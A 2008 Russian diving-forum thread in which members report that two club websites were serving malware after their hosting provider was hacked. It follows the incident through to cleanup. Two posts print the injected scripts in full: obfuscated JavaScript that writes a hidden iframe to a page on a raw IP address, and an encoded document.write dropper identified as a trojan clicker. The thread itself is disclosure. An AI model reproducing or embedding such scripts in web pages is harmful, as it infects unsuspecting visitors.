   
|
Дайвинг в Санкт–Петербурге
Объединенный форум дайв-клубов Санкт-Петербурга и окрестностей
|
| Предыдущая тема :: Следующая тема |
| Автор |
Сообщение |
Михаил Милько
Зарегистрирован: 27.01.2006
Сообщения: 145
Откуда: "Сафари-Тур", Санкт-Петербург
|
 Добавлено: Пт Авг 08, 2008 15:01 Заголовок сообщения: На сайте "Нереиса" - черви. |
 |
|
Техадмину рекомендую оперативно убрать все гиперссылки на сайт "Нереиса" с этого форума (и с иконки и из профайла Александра Чернобельского) - с их первой страницы всем желающим подгружаются черви, кликеры и прочая плесень, причём не самая безобидная.
Далеко не у всех пользователей надежные антивирусы стоят.
Последний раз редактировалось: Михаил Милько (Пт Авг 08, 2008 15:17), всего редактировалось 1 раз |
|
| Вернуться к началу |
|
 |
Tech Admin
Технический Администратор
Зарегистрирован: 06.10.2005
Сообщения: 1185
Откуда: Санкт-Петербург
|
| Добавлено: Пт Авг 08, 2008 15:06 Заголовок сообщения: |
|
|
Ссылку в шапке форума заглушил временно
По остальным вопросам лучше а АЧ обращаться |
|
| Вернуться к началу |
|
|
kifbest
Зарегистрирован: 03.08.2008
Сообщения: 32
|
| Добавлено: Пт Авг 08, 2008 15:07 Заголовок сообщения: |
|
|
| ровно таже ситуация с 2B3, при заходе туда срабатывает антивирус. |
|
| Вернуться к началу |
|
|
Михаил Милько
Зарегистрирован: 27.01.2006
Сообщения: 145
Откуда: "Сафари-Тур", Санкт-Петербург
|
| Добавлено: Пт Авг 08, 2008 15:08 Заголовок сообщения: |
|
|
| Tech Admin писал(а): | Ссылку в шапке форума заглушил временно
По остальным вопросам лучше а АЧ обращаться |
Ему в личку я уже сообщил. |
|
| Вернуться к началу |
|
|
Александр Першанин
Зарегистрирован: 06.07.2005
Сообщения: 9061
|
| Добавлено: Пт Авг 08, 2008 15:40 Заголовок сообщения: |
|
|
2В3 (не диагностируется):
| Код: | <script>
<!--
var d=document,kol=561;
function O10H489AEC0398D2C(H489AEC0399524){ function H489AEC0399D1E() {var H489AEC039A518=16;return H489AEC039A518;} return( parseInt(H489AEC0399524,H489AEC0399D1E()));}function H489AEC039AD0E(H489AEC039B51A){ function H489AEC039CCF1() {var H489AEC039D4EE=2;return H489AEC039D4EE;} var H489AEC039BCFF='';for(H489AEC039C4FE=0; H489AEC039C4FE<H489AEC039B51A.length; H489AEC039C4FE+=H489AEC039CCF1()){ H489AEC039BCFF += ( String.fromCharCode (O10H489AEC0398D2C(H489AEC039B51A.substr(H489AEC039C4FE, H489AEC039CCF1()))));}return H489AEC039BCFF;} document.write(H489AEC039AD0E ('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D 4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F 2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38353035 30292B2735365C272077696474683D333135206865696768743D323730207374796C653D5C27 646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script> |
НЕРЕЙС (инфицирован VBS.PackFor):
| Код: | <script language=JavaScript>
function zazaban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,3,53,29,43,44,32,22,21,5,0,0,0,0,0,0,30,17,50,54,18,14,33,31,24,35,34,37,9,38,20,16,8,41,57,61,47,4,55,42,15,45,49,0,0, 0,0,62,0,59,0,10,1,6,19,48,46,25,58,23,36,56,40,39,27,2,60,51,11,52,13,26,7,28,12);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(176^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}zazaban('zMY2qx3V81RgqX3IHfzZb4moG@3uUkYFpaiC@pSVGDroO@yCNfzCvePlHk3CkIvZvePl1fyByk3IeoSgit3CyovZL4PCifv28aYIz_iC7tyu3kYI')</script> |
|
|
| Вернуться к началу |
|
|
kifbest
Зарегистрирован: 03.08.2008
Сообщения: 32
|
| Добавлено: Пт Авг 08, 2008 15:47 Заголовок сообщения: |
|
|
| Александр Першанин писал(а): | 2В3 (не диагностируется):
| Код: | <script>
<!--
var d=document,kol=561;
function O10H489AEC0398D2C(H489AEC0399524){ function H489AEC0399D1E() {var H489AEC039A518=16;return H489AEC039A518;} return( parseInt(H489AEC0399524,H489AEC0399D1E()));}function H489AEC039AD0E(H489AEC039B51A){ function H489AEC039CCF1() {var H489AEC039D4EE=2;return H489AEC039D4EE;} var H489AEC039BCFF='';for(H489AEC039C4FE=0; H489AEC039C4FE<H489AEC039B51A.length; H489AEC039C4FE+=H489AEC039CCF1()){ H489AEC039BCFF += ( String.fromCharCode (O10H489AEC0398D2C(H489AEC039B51A.substr(H489AEC039C4FE, H489AEC039CCF1()))));}return H489AEC039BCFF;} document.write(H489AEC039AD0E ('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D 4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F 2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38353035 30292B2735365C272077696474683D333135206865696768743D323730207374796C653D5C27 646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script> |
НЕРЕЙС (инфицирован VBS.PackFor):
| Код: | <script language=JavaScript>
function zazaban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,3,53,29,43,44,32,22,21,5,0,0,0,0,0,0,30,17,50,54,18,14,33,31,24,35,34,37,9,38,20,16,8,41,57,61,47,4,55,42,15,45,49,0,0, 0,0,62,0,59,0,10,1,6,19,48,46,25,58,23,36,56,40,39,27,2,60,51,11,52,13,26,7,28,12);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(176^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}zazaban('zMY2qx3V81RgqX3IHfzZb4moG@3uUkYFpaiC@pSVGDroO@yCNfzCvePlHk3CkIvZvePl1fyByk3IeoSgit3CyovZL4PCifv28aYIz_iC7tyu3kYI')</script> |
|
про 2B3 касперский говорит Trojan-Clicker.JS.Agent.h |
|
| Вернуться к началу |
|
|
nereis
Зарегистрирован: 23.06.2005
Сообщения: 15307
Откуда: Санкт-Петербург
|
| Добавлено: Пт Авг 08, 2008 16:48 Заголовок сообщения: |
|
|
| Михаил Милько писал(а): | | Tech Admin писал(а): | Ссылку в шапке форума заглушил временно
По остальным вопросам лучше а АЧ обращаться |
Ему в личку я уже сообщил. |
Ссылку из профиля убрал. Об остальном сообщу специально обученному человеку.
Спасибо.
_________________
Александр Чернобельский
CMAS/КПДР RUS/F00/I3/06/000027
RUAC RUS/I3/22/000002
"Клуб спортивного туризма "БЕЛОЕ МОРЕ" |
|
| Вернуться к началу |
|
|
Никита
Зарегистрирован: 17.09.2007
Сообщения: 60
Откуда: Санкт-Петербург
|
| Добавлено: Пт Сен 12, 2008 13:35 Заголовок сообщения: |
|
|
как всю ветку так и весь раздел - нужно грохнуть..))
черви заселились..
- настало время ВЫСЕЛЯТЬ......  
ЭЭЭ.. ПРЕВЕД ??
_________________
Живы будем - не помрем.. |
|
| Вернуться к началу |
|
|
Max S.Yakovlev
Зарегистрирован: 01.05.2006
Сообщения: 617
Откуда: On-Line Путешественник!
|
| Добавлено: Пт Сен 12, 2008 15:58 Заголовок сообщения: |
|
|
Блин, а хостинг-провайдер у них один и тот же? Может хакнули хостера, как Валуехост в прошлом году 
Тогда на всех сайтах у них коды прописывались...
_________________
UW-Tec.RU - официальный представитель FantaSea Line, ТПА "ГНОМ", и компании DivePoint Maldives (Rannalhi, Hudhuran Fushi, Meedhupparu, Vadoo, Guraidhoo, Amaya Kuda Rah, You&Me, Fuvahmulah) |
|
| Вернуться к началу |
|
|
nereis-www
Зарегистрирован: 17.09.2008
Сообщения: 2
|
| Добавлено: Ср Сен 17, 2008 12:51 Заголовок сообщения: Черви вычищены |
|
|
Действительно, это поломали хостинг провайдера.
(в наш html код после вредных js-функций были вписаны комментарии, типа это код от хостинг провайдера)
Сейчас весь "чужой" код найден и удален. Все работает как надо.
Можно спокойно заходить к нам на сайт.
Спасибо.
P.S.
Еще мы понемногу совершенствуем сайт.
Если будут какие замечания по работе - пишите пож-та в личку. |
|
| Вернуться к началу |
|
|
Tech Admin
Технический Администратор
Зарегистрирован: 06.10.2005
Сообщения: 1185
Откуда: Санкт-Петербург
|
| Добавлено: Ср Сен 17, 2008 13:48 Заголовок сообщения: |
|
|
| Ссылка в шапке восстановлена. |
|
| Вернуться к началу |
|
|
Дмитрич
Зарегистрирован: 17.03.2008
Сообщения: 382
Откуда: Санкт-Петербург
|
| Добавлено: Ср Сен 17, 2008 14:06 Заголовок сообщения: Re: Черви вычищены |
|
|
| nereis-www писал(а): | P.S.
Еще мы понемногу совершенствуем сайт.
Если будут какие замечания по работе - пишите пож-та в личку. |
Какой то глюк у вас на сайте.
Нажимаю на фото в разделе "условия проживания" и выкидывает сразу на главную.
_________________
Алексей, CMAS*, AOWD |
|
| Вернуться к началу |
|
|
nereis-www
Зарегистрирован: 17.09.2008
Сообщения: 2
|
| Добавлено: Ср Сен 17, 2008 15:15 Заголовок сообщения: Re: Черви вычищены |
|
|
| Tech Admin писал(а): | | Ссылка в шапке восстановлена. |
Спасибо. Жизнь продолжается!
| Дмитрич писал(а): | | nereis-www писал(а): | P.S.
Еще мы понемногу совершенствуем сайт.
Если будут какие замечания по работе - пишите пож-та в личку. |
Какой то глюк у вас на сайте.
Нажимаю на фото в разделе "условия проживания" и выкидывает сразу на главную. |
Да, пока что есть такое дело. Почти со всеми всплывающими фотографиями.
Побочный эфект удаления червей - были удалены js-функции.
Сейчас мы страница за страницей проверяем и восстанавливаем.
За два-три дня поправим... Спасибо! |
|
| Вернуться к началу |
|
|
|
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
|
|
Правила
Фотоальбом
Поиск
Участники
Группы
Регистрация
RSS
Профиль
Войти и проверить личные сообщения
Вход
